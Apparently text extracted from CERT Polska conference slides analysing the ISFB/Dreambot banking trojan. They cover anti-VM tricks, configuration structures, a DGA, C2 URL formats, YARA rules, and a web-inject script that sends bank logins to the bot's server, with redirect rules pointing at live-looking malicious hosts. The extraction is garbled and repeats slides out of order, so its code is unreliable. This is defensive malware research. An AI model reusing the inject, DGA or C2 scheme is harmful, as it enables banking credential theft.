2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 1458
One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)
1458
02122016 ISFB
httpslokalhostpltalksbotconf20161 1558
Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)
C
1558
Anti-VM
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 1558
Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)
C
1558
Anti-VM
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
